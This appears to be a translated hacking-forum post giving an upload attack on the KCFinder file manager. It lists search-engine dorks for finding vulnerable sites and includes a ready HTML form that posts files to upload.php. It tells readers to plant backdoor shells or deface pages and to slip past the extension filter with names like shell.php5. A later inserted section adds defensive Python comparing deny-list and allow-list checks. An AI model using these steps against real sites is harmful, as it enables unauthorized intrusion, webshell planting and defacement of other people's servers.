KCFinder Shell Upload



Google Dork : 

inurl:/kcfinder/browse.php
lib/kcfinder/files/upload
admin/kcfinder/files/upload
panel/kcfinder/upload/files
editor/kcfinder/upload
Kcfinder/upload/files

(for the rest, use your brain)

Exploit :

 www.site.com/path/kcfinder/upload.php 
 

If the page shows 'Unknown error', the site is vulnerable; if not, it is not :D

Copy and paste the CSRF script below and save it as an HTML file

 <form method="POST" action="http://site.com/path/kcfinder/upload.php"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>Hajar !</button>
</form>

Upload your deface script or your backdoor shell...
but before planting the shell, the extension must be changed to ndsfx or .php5 >> shell.php.ndsfx

Recommended shell names [ shell.php2 & shell.php5 & shell.php.black & shell.shtml & scriptdeface.html ]
Shell extensions that often cannot be uploaded => "exe, com, msi, bat, php, phps, phtml, php3, php4, cgi, pl"
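
The filter described above blocks only a fixed set of final extensions, which is why names such as shell.php5 or shell.php.ndsfx get through. As an added example (not part of the original post and not KCFinder's own code), the Python below contrasts that deny-list check with an allow-list that accepts a single approved extension; the allow-list contents and all function names are assumptions.

```python
import re

# Deny-list quoted on the page (extensions the uploader commonly rejects).
DENIED = {"exe", "com", "msi", "bat", "php", "phps", "phtml",
          "php3", "php4", "cgi", "pl"}
# Assumed allow-list for an image/document upload folder (not from the page).
ALLOWED = {"jpg", "jpeg", "png", "gif", "pdf"}
# Assumed rule for the part of the name before the extension.
SAFE_STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")


def denylist_accepts(filename: str) -> bool:
    """Weak check: only the final extension is compared with a deny-list."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in DENIED


def allowlist_accepts(filename: str) -> bool:
    """Hardened check: exactly one extension, and it must be allow-listed."""
    parts = filename.split(".")
    if len(parts) != 2:  # rejects double extensions and extensionless names
        return False
    stem, ext = parts
    return bool(SAFE_STEM.fullmatch(stem)) and ext.lower() in ALLOWED


# File names mentioned on the page, plus one constructed benign name.
SAMPLES = ["shell.php", "shell.php2", "shell.php5", "shell.php.black",
           "shell.php.ndsfx", "shell.shtml", "scriptdeface.html", "photo.jpg"]


def compare(names=SAMPLES):
    """Return {name: (denylist_result, allowlist_result)}."""
    return {n: (denylist_accepts(n), allowlist_accepts(n)) for n in names}


if __name__ == "__main__":
    for name, (weak, strong) in compare().items():
        print(f"{name:20} deny-list={'accept' if weak else 'reject'}  "
              f"allow-list={'accept' if strong else 'reject'}")
```

On the server, pair the allow-list with an upload directory in which script execution is disabled, so a file that slips through is served as static content only.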

Shell / deface page location: www.site.com/[path]/kcfinder/upload/files/shelllu.php.ndsfx/etc

Hope this is useful
